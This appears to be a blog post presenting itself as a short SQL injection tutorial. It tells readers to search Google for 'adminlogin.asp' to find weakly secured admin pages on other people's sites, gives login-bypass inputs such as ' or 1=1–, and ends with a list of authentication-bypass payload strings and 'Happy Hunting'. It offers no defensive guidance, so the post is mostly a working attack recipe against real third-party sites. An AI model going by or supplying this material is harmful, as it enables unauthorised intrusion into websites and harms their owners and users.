SQL injection vulnerabilities are all over the Internet, including all over high profile sites.
The reason SQL injection works is that whereas most systems separate code and data, SQL combines them together. All a hacker needs to do is include some of his own code with the data he sends to a website, then he can gain control of the website.
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
Find an admin page of a low security site or just Google adminlogin.asp .
There are plenty of vulnerable sites that show up.
Gaining access is the easiest part . Type:
user:admin (you don't even have to put this.)pass:’ or 1=1–
or
user:’ or 1=1–
admin:’ or 1=1–
Some sites will have just a password so
password:’ or 1=1–
So that is my short tutorial on SQL injections,below you will find a further list of combinations.
Combo List
So here is the Complete List of SQL Injection Strings which I have Compiled and Today I am going to
share it with you. So Enjoy and Happy Hunting.
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
No comments:
Post a Comment